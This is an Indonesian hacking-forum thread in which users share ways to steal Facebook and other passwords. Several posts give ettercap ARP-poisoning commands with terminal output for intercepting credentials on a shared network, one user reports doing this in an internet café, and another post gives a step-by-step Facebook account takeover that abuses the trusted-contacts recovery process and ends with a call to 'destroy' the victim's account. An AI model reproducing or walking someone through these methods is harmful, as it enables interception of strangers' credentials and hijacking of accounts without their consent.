Thread Closed
[Share] Sniffing password FB dkk dengen script
#91
tpi kl ane sniffing password d jaringan ane cm kaya gini bro

# echo '1' > /proc/sys/net/ipv4/ip_forward
# ettercap -T -i eth0 -M arp:remote // //
jalanin bentar, trus tinggal buka log'y

# etterlog -a sniff.eci
nnti ada info berapa user account yg d dpt..
trus kl mo liat password n user
# etterlog -p sniff.eci

Smile :apn:
Hacking isn't just Computers & Exploits. It's a Philosophy.

#92
Quote:# etterlog -a sniff.eci
nnti ada info berapa user account yg d dpt..
trus kl mo liat password n user
# etterlog -p sniff.eci

kak ane dah coba cara kak....
pas ane coba buka....

etterlog -a sniff.eci & etterlog -p sniff.eci
keluarnya:
Quote:etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGA

ERROR : 2, No such file or directory
[el_log.c:open_log:49]

stream error
Smile Smile

solusinya dunkz....Tongue

#93
(10-08-2011, 02:30 AM)newbie212 Wrote:
Quote:# etterlog -a sniff.eci
nnti ada info berapa user account yg d dpt..
trus kl mo liat password n user
# etterlog -p sniff.eci

kak ane dah coba cara kak....
pas ane coba buka....

etterlog -a sniff.eci & etterlog -p sniff.eci
keluarnya:
Quote:etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGA

ERROR : 2, No such file or directory
[el_log.c:open_log:49]

stream error
Smile Smile

solusinya dunkz....Tongue
pake bt5??kalo g salah ettercap bt5 sedikit bermasalah,,coba instal ulang aja dulu ettercap nya ,,saya kemaren juga gtu,,
setelah instal ulang saya bsa sniff sesuka hati,,malahan kita bisa edit2 scriptnya sesuai kebutuhan Big Grin Smile Smile

#94
etterlog -p sniff.eci

sniff.eci ini tergantung nama file yg kita pake buat log dri

ettercap -T -L sniff -M arp:remote // //

-T text mode
- L log
- sniff <--- nm file output log
- M mitm
[email protected]:~# ettercap -T -L sniff -M arp:remote // //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0... (Ethernet)

eth0 -> 00:0C:29:9C:89:70 192.168.126.128 255.255.255.0

Privileges dropped to UID 65534 GID 65534...

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...

q

[email protected]:~# etterlog -a sniff.eci

etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Log file version : NG-0.7.3
Timestamp : Sat Oct 8 08:47:38 2011
Type : LOG_INFO



Number of hosts (total) : 3

Number of local hosts : 3
Number of non local hosts : 0
Number of gateway : 0

Number of discovered services : 2
Number of accounts captured : 0

[email protected]:~# etterlog -p sniff.eci

etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Log file version : NG-0.7.3
Timestamp : Sat Oct 8 08:47:38 2011
Type : LOG_INFO


ini cm contoh ane jalanin cm 2 menit.. jd g dpt akun apa2..

Smile
Hacking isn't just Computers & Exploits. It's a Philosophy.

#95
Cara ngehack fb orang gmn ni bro pakek bt 5...???
Ane buka jahat ni ya....
Tp forum tempat ane berbagi di fb di abil alih....
Jadi ane harus hack akun si yang pengambil alih tsb...
Temen2 di forum juga udah pada ribut semua tuh...
Kejadiannya baru td malam ni bro....
Mohon percerahannya bro...

#96
(10-08-2011, 04:36 PM)Andria_nai Wrote: Cara ngehack fb orang gmn ni bro pakek bt 5...???
Ane buka jahat ni ya....
Tp forum tempat ane berbagi di fb di abil alih....
Jadi ane harus hack akun si yang pengambil alih tsb...
Temen2 di forum juga udah pada ribut semua tuh...
Kejadiannya baru td malam ni bro....
Mohon percerahannya bro...

ya kalo tau yang nge hack siapa mah tinggal mnta aja,,kalog tau,, kepaksa pake cara pishing atau hack pesbuk dengan pesbuk,,di tetangga sebelah ada,tapi mngkin g bisa kebuka kalo g member,,
kira kira begini
Spoiler! :

-temen yang mw dibagi kode konfirmasi mesti jelas emailnya,,
-biasany kode konfirmasi dikirim jg melalui sms ke kontak teman yg dibagi kode konfirmasiny...
-saat pertama memilih tman yang mw di kirim kode infonya,,,
pilih tmen yg gk se grup/sekolah/jaringan ama tman ke 2 dan ke 3 yg mw dkirim kode konfirmasi,,, soalnya teman sgrup/sekolah/jaringan biasa ny gk nampak saat kita mlih teman ke 2...

berikut ss nya,
maaf ga ga pake facebook guru ane
kasian takut dia malu hahaha

pertama klik lupa kata sandi atau forgot your pasword

dan hasil nya akan seperti ini
isi kedua kolom yang saya kasih kurung
yaitu
-masukan nama pengguna seperti http://facebook.com/fatimahcute
untuk melihat itu brotinggal masuk profil korban dan sedott nama penggunanya di addres bar kemudian lemparr ^_^



-setelah diisi klik pencarian dan hasil nya akan seperti ini bro
lalu klik
tulisan saya tidak punya akses kesini lagi ?



-setelah itu akan terlihat seperti ini
masukan email yang telah brobuat untuk di tanem di facebook korban



-setlah itu akan terlihat seperti ini bro ^_^
klik aja continue



-pilih 3 teeman yang akan di jadikan tempat pengiriman email konfirmasi
facebook si korban



SELESAI DEH TINGGAL

-liat kode konfirmasi yang dikirim ke e-mail temen-temen agan ^_^
dan monggoo hancurin tuh fb korban ampe luddessss
dan inget jangan pernah bilang pe-ha-ka itu ngga ada
kami ada kami nyata dan kami eksis !




Kurang Dan Lebih Nya Mohon Maaf hehe. kalo ad pertanyaan PM aj ok


#97
bro ane kan udah berhasil percobaan snffing password pake script tapi semua komp di warnet ane internetnya kok jadi lemot banget .. .. ., mohon pencerahaanya. . .

#98
Thank's bro....

#99
wah makin semangat nih belajar'a, makasih kk'..
Big Grin

(08-18-2011, 02:18 PM)konspirasi Wrote: asal ga ada admin yg jaga sih bisa bro :p


caranya sama aja yg di tulis kan om? mau coba nih om...

dah panas nih om ama mikrotik, penasaran bgt ama mikrotik,, mnurut om mikrotik itu gmn? emg rumit amat ya kalo berurusan ama yg nmanya mikrotik?
Angry

:badpc: =======> MIKROTIK <========== :badpc:


Thread Closed


Users browsing this thread: 1 Guest(s)